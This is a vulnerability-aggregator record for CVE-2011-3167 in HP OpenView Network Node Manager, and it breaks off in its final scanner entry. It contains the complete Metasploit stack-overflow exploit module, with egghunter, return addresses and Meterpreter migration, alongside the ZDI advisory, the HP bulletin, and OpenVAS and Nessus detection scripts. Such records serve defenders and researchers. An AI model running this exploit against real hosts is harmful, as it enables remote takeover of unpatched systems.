<< \"OvAcceptLang=en-US; \"\n my_cookie << \"OvJavaLocale=en_US.Cp1252; \"\n my_cookie << \"OvWebSession=#{web_session}:AnyUser:\"\n\n cgi = '/OvCgi/webappmon.exe'\n\n res = send_request_cgi({\n 'uri' => cgi,\n 'cookie' => my_cookie,\n 'method' => \"POST\",\n 'vars_post' =>\n {\n 'ins' => 'nowait',\n 'sel' => rand_text_alphanumeric(15),\n 'app' => 'IP Tables',\n 'act' => 'Services',\n 'help' => '',\n 'cache' => rand_text_numeric(4)\n },\n 'data' => \"arg=#{buf}\" # Avoid uri encoding\n }, 3)\n\n if res and res.code != 502\n print_error(\"Eek! We weren't expecting a response, but we got one\")\n end\n\n handler\n\n end\nend\n\n=begin\n\n* migrate to %windir%/system32/notepad.exe fails on Windows XP SP3\n\nmeterpreter > run post/windows/manage/migrate\n\n[*] Running module against HOME-F006222D6C\n[*] Current server process: webappmon.exe (7064)\n[*] Spawning notepad.exe process to migrate to\n[-] Post failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.\n[-] Call stack:\n[-] /projects/exploiting/trunk/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:163:in `execute'\n[-] (eval):80:in `create_temp_proc'\n[-] (eval):49:in `run'\n=end\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:14:02", "description": "", "published": "2012-01-20T00:00:00", "type": "packetstorm", "title": "HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3167"], "modified": "2012-01-20T00:00:00", "id": "PACKETSTORM:108874", "href": "https://packetstormsecurity.com/files/108874/HP-OpenView-Network-Node-Manager-ov.dll-_OVBuildPath-Buffer-Overflow.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \nHttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/webappmon.exe', :pattern => /Hewlett-Packard Development Company/ } \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::Egghunter \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in HP OpenView Network Node \nManager 7.53 prior to NNM_01213 without the SSRT100649 hotfix. By specifying a long \n'textFile' argument when calling the 'webappmon.exe' CGI program, an attacker can \ncause a stack-based buffer overflow and execute arbitrary code. \n \nThe vulnerable code is within the \"_OVBuildPath\" function within \"ov.dll\". There \nare no stack cookies, so exploitation is achieved by overwriting the saved return \naddress. \n \nThe vulnerability is due to the use of the function \"_OVConcatPath\" which finally \nuses \"strcat\" in a insecure way. User controlled data is concatenated to a string \nwhich contains the OpenView installation path. \n \nTo achieve reliable exploitation a directory traversal in OpenView5.exe \n(OSVDB 44359) is being used to retrieve OpenView logs and disclose the installation \npath. If the installation path cannot be guessed the default installation path \nis used. \n} , \n'Author' => \n[ \n'Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability Discovery \n'juan vazquez', # Metasploit module \n'sinn3r' # Metasploit fu \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2011-3167' ], \n[ 'OSVDB', '76775' ], \n[ 'BID', '50471' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-002/' ], \n[ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03054052' ] \n], \n'Payload' => \n{ \n'Space' => 950, \n'BadChars' => [*(0x00..0x09)].pack(\"C*\") + [*(0x0b..0x23)].pack(\"C*\") + [0x26, 0x2b, 0x3c, 0x3e, 0x5b, 0x5d, 0x5e, 0x60, 0x7e, 0x7f].pack(\"C*\"), \n'DisableNops' => true, \n'EncoderOptions' => \n{ \n'BufferRegister' => 'EDI' # Egghunter jmp edi \n} \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'HP OpenView Network Node Manager 7.53 / Windows 2000 SP4 & Windows XP SP3', \n# Patches installed: \n# * ECS_00048 \n# * NNM_01128 \n# * NNM_01172 \n# * NNM_01187 \n{ \n'Offset' => 1067, \n'Ret' => 0x5a41656a, # pop/pop/ret - in ov.dll (v1.30.5.8002) \n'JmpESP' => 0x5a4251c5, # call esp - in ov.dll \n'EggAdjust' => 4, \n'ReadableAddress' => 0x5a466930 # ov.dll \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Nov 01 2011')) \n \nregister_options( \n[ \nOpt::RPORT(80), \n], self.class) \nend \n \n# The following code allows to migrate if having into account \n# that over Windows XP permissions aren't granted on %windir%\\system32 \n# \n# Code ripped from \"modules/post/windows/manage/migrate.rb\". See it \n# for more information \ndef on_new_session(client) \n \nif client.type != \"meterpreter\" \nprint_error(\"NOTE: you must use a meterpreter payload in order to process migration.\") \nreturn \nend \n \nclient.core.use(\"stdapi\") if not client.ext.aliases.include?(\"stdapi\") \n \n# Select path and executable to run depending the architecture \n# and the operating system \nif client.sys.config.sysinfo[\"OS\"] =~ /Windows XP/ \nwindir = client.fs.file.expand_path(\"%ProgramFiles%\") \ncmd=\"#{windir}\\\\Windows NT\\\\Accessories\\\\wordpad.exe\" \nelse # Windows 2000 \nwindir = client.fs.file.expand_path(\"%windir%\") \nif client.sys.config.sysinfo['Architecture'] =~ /x86/ \ncmd = \"#{windir}\\\\System32\\\\notepad.exe\" \nelse \ncmd = \"#{windir}\\\\Sysnative\\\\notepad.exe\" \nend \nend \n \n# run hidden \nprint_status(\"Spawning #{cmd.split(\"\\\\\").last} process to migrate to\") \nproc = client.sys.process.execute(cmd, nil, {'Hidden' => true }) \ntarget_pid = proc.pid \n \nbegin \nprint_good(\"Migrating to #{target_pid}\") \nclient.core.migrate(target_pid) \nprint_good(\"Successfully migrated to process #{target_pid}\") \nrescue ::Exception => e \nprint_error(\"Could not migrate in to process.\") \nprint_error(e.to_s) \nend \n \nend \n \n# Tries to guess the HP OpenView install dir via the Directory traversal identified \n# by OSVDB 44359. \n# If OSVDB 44359 doesn't allow to retrieve the installation path the default one \n# (C:\\Program Files\\HP OpenView\\) is used. \n# Directory Traversal used: \n# http://host/OvCgi/OpenView5.exe?Context=Snmp&Action=../../../log/setup.log \ndef get_install_path \n \ncgi = '/OvCgi/OpenView5.exe' \nweb_session = rand_text_numeric(3) \nmy_cookie = \"OvOSLocale=English_United States.1252; \" \nmy_cookie << \"OvAcceptLang=en-US; \" \nmy_cookie << \"OvJavaLocale=en_US.Cp1252; \" \nmy_cookie << \"OvWebSession=#{web_session}:AnyUser:\" \n \npayload = \"../../../log/setup.log\" \nres = send_request_cgi({ \n'uri' => cgi, \n'cookie' => my_cookie, \n'method' => \"GET\", \n'vars_get' => \n{ \n'Target' => \"Main\", \n'Scope' => \"Snmp\", \n'Action' => payload \n} \n}, 5) \n \ninstallation_path = \"\" \nif res and res.code == 200 and \nres.body =~ /([A-Z]:\\\\.*\\\\)log/ \nprint_status(\"Installation Path Found in #{$1}\") \ninstallation_path = $1 \nelse \nprint_status(\"Installation Path Not Found using the default\") \ninstallation_path = \"C:\\\\Program Files\\\\HP OpenView\\\\\" \nend \n \nreturn installation_path \nend \n \ndef exploit \nprint_status(\"Trying target #{target.name}...\") \n \ninstall_path = get_install_path \ninstall_path << \"help\\\\English_United States.1252\" \n \neggoptions = { \n:checksum => true, \n} \nhunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions) \n \n[ 'x86/alpha_mixed'].each { |name| \nenc = framework.encoders.create(name) \nif name =~/alpha/ \n# If control is transferred to the decoder via \"call esp\" BufferOfset \n# shoulds be adjusted. \nif target[\"EggAdjust\"] and target[\"EggAdjust\"] > 0 \nenc_options = { \n'BufferRegister' => 'ESP', \n'BufferOffset' => target[\"EggAdjust\"] \n} \nenc.datastore.import_options_from_hash(enc_options) \nelse \nenc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' }) \nend \nend \nhunter = enc.encode(hunter, nil, nil, platform) \n} \n \noffset = target['Offset'] - install_path.length - egg.length \n \nmy_payload = egg \nmy_payload << rand_text_alphanumeric(offset) \nmy_payload << [target.ret].pack(\"V\") \nmy_payload << rand_text_alphanumeric(4) # Padding \nmy_payload << [target[\"ReadableAddress\"]].pack(\"V\") \nmy_payload << [target[\"JmpESP\"]].pack(\"V\") \nmy_payload << hunter \n \nbuf = \"-textFile+#{my_payload}+++++++++++++++++++++++\" \nbuf << \"-appendSelectList+-appendSelectListToTitle+%09%09++++++\" \nbuf << \"-commandHeading+%22Protocol+++++++++Port++++++++Service%22+++++++++++++++++++++++\" \nbuf << \"-dataLine+2+\" \nbuf << \"-commandTitle+%22Services%22+%09%09++++++\" \nbuf << \"-iconName+%22Services%22+++++++++++++++++++++++\" \nbuf << \"-cmd+rnetstat+\" \nbuf << \"-S\" \n \nweb_session = rand_text_numeric(3) \nmy_cookie = \"OvOSLocale=English_United States.1252; \" \nmy_cookie << \"OvAcceptLang=en-US; \" \nmy_cookie << \"OvJavaLocale=en_US.Cp1252; \" \nmy_cookie << \"OvWebSession=#{web_session}:AnyUser:\" \n \ncgi = '/OvCgi/webappmon.exe' \n \nres = send_request_cgi({ \n'uri' => cgi, \n'cookie' => my_cookie, \n'method' => \"POST\", \n'vars_post' => \n{ \n'ins' => 'nowait', \n'sel' => rand_text_alphanumeric(15), \n'app' => 'IP Tables', \n'act' => 'Services', \n'help' => '', \n'cache' => rand_text_numeric(4) \n}, \n'data' => \"arg=#{buf}\" # Avoid uri encoding \n}, 3) \n \nif res and res.code != 502 \nprint_error(\"Eek! We weren't expecting a response, but we got one\") \nif datastore['DEBUG'] \nprint_line() \nprint_error(res.inspect) \nend \nend \n \nhandler \n \nend \n \nend \n \n=begin \n \n* migrate to %windir%/system32/notepad.exe fails on Windows XP SP3 \n \nmeterpreter > run post/windows/manage/migrate \n \n[*] Running module against HOME-F006222D6C \n[*] Current server process: webappmon.exe (7064) \n[*] Spawning notepad.exe process to migrate to \n[-] Post failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied. \n[-] Call stack: \n[-] /projects/exploiting/trunk/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:163:in `execute' \n[-] (eval):80:in `create_temp_proc' \n[-] (eval):49:in `run' \n=end`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/108874/hp_nnm_ovbuildpath_textfile.rb.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:43", "bulletinFamily": "software", "cvelist": ["CVE-2011-3167"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nZDI-12-002 : HP OpenView NNM ov.dll _OVBuildPath Remote Code Execution\r\nVulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-12-002\r\nJanuary 5, 2012\r\n\r\n- -- CVE ID:\r\nCVE-2011-3167\r\n\r\n- -- CVSS:\r\n10, AV:N/AC:L/Au:N/C:C/I:C/A:C\r\n\r\n- -- Affected Vendors:\r\n\r\nHewlett-Packard\r\n\r\n\r\n\r\n- -- Affected Products:\r\n\r\nHewlett-Packard OpenView Network Node Manager\r\n\r\n\r\n\r\n- -- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 11952.\r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n- -- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of OpenView Network Node Manager.\r\nAuthentication is not required to exploit this vulnerability.\r\n\r\nThe specific flaw exists within ov.dll. When processing a user supplied\r\nfile name for the textFile option, there exists an insufficient boundary\r\ncheck before supplying the value to a format string within _OVBuildPath,\r\ncausing a stack overflow. This can lead to memory corruption which can\r\nbe leveraged to execute arbitrary code under the context of the target\r\nservice.\r\n\r\n- -- Vendor Response:\r\n\r\nHewlett-Packard has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03054052\r\n\r\n\r\n\r\n\r\n- -- Disclosure Timeline:\r\n2011-05-12 - Vulnerability reported to vendor\r\n\r\n2012-01-05 - Coordinated public release of advisory\r\n\r\n\r\n\r\n- -- Credit:\r\nThis vulnerability was discovered by:\r\n\r\n* Aniway (Aniway.Anyway@gmail.com)\r\n\r\n\r\n\r\n- -- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents\r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.17 (MingW32)\r\n\r\niQEcBAEBAgAGBQJPBhGKAAoJEFVtgMGTo1sc9iMIAKQvY/dI3KyzEMtF9fFKwr0r\r\nhNN++wJsxKzXQP4DDmgRbnFbTOeg93x7ytaPxqcmxJRhjXqLIdnk8eevi/YNP8o5\r\nzqB19Ty4Oo+Ie0zI+ZAdkZODhilf76QL23k/HP4mB7F+IO0ZEQ7tJTQ5clxxJfni\r\nocugYsqbjII9TIAeAAEZnNKFmcYqq8AU7jwtcITk3m3cq2F3dsB8AKIvtYKd2rqY\r\n3PfvNGuFXxYP+qv95ijERoAY6XsiMFncmnIQ0oURMDMPsZUv7kgBcSYDJ+k6rZnW\r\nscRq7MZg+ATE0KgpDlN/EHEOx0r7bjCigs0oRiiffi7+62U3YjO/rMRUYiNZcZc=\r\n=SgJL\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-01-09T00:00:00", "published": "2012-01-09T00:00:00", "id": "SECURITYVULNS:DOC:27517", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27517", "title": "ZDI-12-002 : HP OpenView NNM ov.dll _OVBuildPath Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:42", "bulletinFamily": "software", "cvelist": ["CVE-2011-3166", "CVE-2011-3167", "CVE-2011-3165"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c03054052\r\nVersion: 1\r\n\r\nHPSBMU02712 SSRT100649 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2011-11-01\r\nLast Updated: 2011-11-01\r\n\r\nPotential Security Impact: Remote execution of arbitrary code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). The vulnerabilities could be exploited remotely to execute arbitrary code under the context of the user running the web server.\r\n\r\nReferences: CVE-2011-3165 (ZDI-CAN-1208), CVE-2011-3166 (ZDI-CAN-1209), CVE-2011-3167 (ZDI-CAN-1210)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP OpenView Network Node Manager (OV NNM) v7.51, v7.53 running on HP-UX, Linux, Solaris, and Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2011-3165 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\r\nCVE-2011-3166 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\r\nCVE-2011-3167 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks Aniway.Anyway@gmail.com along with TippingPoint's Zero Day Initiative for reporting these vulnerabilities to security-alert@hp.com.\r\n\r\nRESOLUTION\r\n\r\nHP has made patches available to resolve the vulnerabilities for NNM v7.53.\r\n\r\nOV NNM v7.53\r\n\r\nThe patches are available from http://support.openview.hp.com/selfsolve/patches\r\n\r\nOperating System\r\n Patch\r\n\r\nHP-UX (IA)\r\n PHSS_42233 or subsequent\r\n\r\nHP-UX (PA)\r\n PHSS_42232 or subsequent\r\n\r\nLinux RedHatAS2.1\r\n LXOV_00121 or subsequent\r\n\r\nLinux RedHat4AS-x86_64\r\n LXOV_00122 or subsequent\r\n\r\nSolaris\r\n PSOV_03535 or subsequent\r\n\r\nWindows\r\n NNM_01213 or subsequent\r\n\r\nOV NNM v7.51\r\nUpgrade to NNM v7.53 and apply the NNM v7.53 resolution listed above.\r\nPatch bundles for upgrading from NNM v7.51 to NNM v7.53 are available using ftp:\r\n\r\nHost\r\n Account\r\n Password\r\n\r\nftp.usa.hp.com\r\n nnm_753\r\n Update53\r\n\r\nMANUAL ACTIONS: No\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\n\r\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa\r\n\r\nThe following text is for use by the HP-UX Software Assistant.\r\n\r\nAFFECTED VERSIONS (for HP-UX)\r\n\r\nFor HP-UX OV NNM 7.51 and 7.53\r\nHP-UX B.11.31\r\nHP-UX B.11.23 (IA)\r\nHP-UX B.11.23 (PA)\r\nHP-UX B.11.11\r\n=============\r\nOVNNMgr.OVNNM-RUN,fr=B.07.50.00\r\naction: install the patch listed in the Resolution\r\n\r\nEND AFFECTED VERSIONS (for HP-UX)\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 1 November 2011 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2011 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAk6v8csACgkQ4B86/C0qfVm3fgCg2GwzmrwM+5/sJSFhzBx1/HCg\r\n6asAoJjjvHr/FYV0zvdxCMWEm/NjmZ+x\r\n=NS88\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2011-11-06T00:00:00", "published": "2011-11-06T00:00:00", "id": "SECURITYVULNS:DOC:27279", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27279", "title": "[security bulletin] HPSBMU02712 SSRT100649 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:44", "bulletinFamily": "software", "cvelist": ["CVE-2011-3166", "CVE-2011-3167", "CVE-2011-3165"], "description": "No description provided", "edition": 1, "modified": "2012-01-09T00:00:00", "published": "2012-01-09T00:00:00", "id": "SECURITYVULNS:VULN:12023", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12023", "title": "HP OpenView Network Node Manager code execution", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:39:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3166", "CVE-2011-3167"], "description": "HP OpenView Network Node Manager (NNM) is prone to multiple remote\n code-execution vulnerabilities because it fails to sanitize user-supplied data.", "modified": "2018-10-22T00:00:00", "published": "2011-12-14T00:00:00", "id": "OPENVAS:1361412562310103364", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103364", "type": "openvas", "title": "HP OpenView Network Node Manager Multiple Remote Code Execution Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_hp_openview_nnm_50471.nasl 12018 2018-10-22 13:31:29Z mmartin $\n#\n# HP OpenView Network Node Manager Multiple Remote Code Execution Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:hp:openview_network_node_manager\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103364\");\n script_bugtraq_id(50471);\n script_cve_id(\"CVE-2011-3166\", \"CVE-2011-3167\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12018 $\");\n script_name(\"HP OpenView Network Node Manager Multiple Remote Code Execution Vulnerabilities\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 15:31:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-12-14 09:14:18 +0100 (Wed, 14 Dec 2011)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"secpod_hp_openview_nnm_detect.nasl\");\n script_require_ports(\"Services/www\", 7510);\n script_mandatory_keys(\"HP/OVNNM/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/50471\");\n script_xref(name:\"URL\", value:\"http://www.openview.hp.com/products/nnm/\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/520349\");\n\n script_tag(name:\"summary\", value:\"HP OpenView Network Node Manager (NNM) is prone to multiple remote\n code-execution vulnerabilities because it fails to sanitize user-supplied data.\");\n script_tag(name:\"affected\", value:\"These issues affects NNM 7.51, v7.53 running on HP-UX, Linux, Solaris,\n and Windows. Other versions and platforms may also be affected.\");\n script_tag(name:\"solution\", value:\"Updates are available.Please contact the vendor for more information.\");\n script_tag(name:\"impact\", value:\"An attacker can exploit these issues to execute arbitrary code with\n the privileges of the user running the affected application.\n Successful exploits will compromise the affected application and\n possibly the underlying computer.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nget_app_version( cpe:CPE, port:port );\nif( ! vers = get_kb_item( \"www/\"+ port + \"/HP/OVNNM/Ver\" ) ) exit( 0 );\n\nif( version_is_equal( version:vers, test_version:\"B.07.51\" ) ||\n version_is_equal( version:vers, test_version:\"B.07.53\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"See references\" );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-03-01T03:31:06", "description": "The installed version of HP Network Node Manager is affected by the\nfollowing vulnerabilities :\n\n - A remote code execution vulnerability exists because\n the 'nnmRptConfig.exe' CGI application does not\n adequately validate user-supplied input. (CVE-2011-3165)\n\n - A remote code execution vulnerability exists within\n ov.dll. Insufficient boundary checking before supplying\n the value to a format string within _OVBuildPath can\n cause a stack overflow, leading to memory corruption,\n which could allow an attacker to execute arbitrary code\n within the context of the target service. (CVE-2011-3166)\n\n - A remote code execution vulnerability exists within the\n webappmon.exe CGI program. The vulnerability is due an\n insufficient boundary check before supplying a format\n string with the values. This causes a stack overflow,\n which can lead to memory corruption that can be\n exploited to execute arbitrary code within the context\n of the target service. (CVE-2011-3167)", "edition": 28, "published": "2012-03-28T00:00:00", "title": "HP OpenView Network Node Manager Multiple Code Execution Vulnerabilities (HPSBMU02712 SSRT100649)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3166", "CVE-2011-3167", "CVE-2011-3165"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:hp:openview_network_node_manager", "cpe:/a:hp:openview_network_node_manager"], "id": "HP_NNM_MULTIPLE_CODE_EXECUTION.NASL", "href": "https://www.tenable.com/plugins/nessus/58516", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(58516);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-2011-3165\", \"CVE-2011-3166\", \"CVE-2011-3167\");\n script_bugtraq_id(50471, 51049);\n\n script_name(english:\"HP OpenView Network Node Manager Multiple Code Execution Vulnerabilities (HPSBMU02712 SSRT100649)\");\n script_summary(english:\"Checks NNM version & patch level\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of HP Network Node Manager running on the remote host is\naffected by multiple code execution vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of HP Network Node Manager is affected by the\nfollowing vulnerabilities :\n\n - A remote code execution vulnerability exists because\n the 'nnmRptConfig.exe' CGI application does not\n adequately validate user-supplied input. (CVE-2011-3165)\n\n - A remote code execution vulnerability exists within\n ov.dll. Insufficient boundary checking before supplying\n the value to a format string within _OVBuildPath can\n cause a stack overflow, leading to memory corruption,\n which could allow an attacker to execute arbitrary code\n within the context of the target service. (CVE-2011-3166)\n\n - A remote code execution vulnerability exists within the\n webappmon.exe CGI program. The vulnerability is due an\n insufficient boundary check before supplying a format\n string with the values. This causes a stack overflow,\n which can lead to memory corruption that can be\n exploited to execute arbitrary code within the context\n of the target service. (CVE-2011-3167)\");\n\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-11-348/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-002/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-003/\");\n # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c03054052-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?02dda619\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/520349\");\n\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to B.07.53 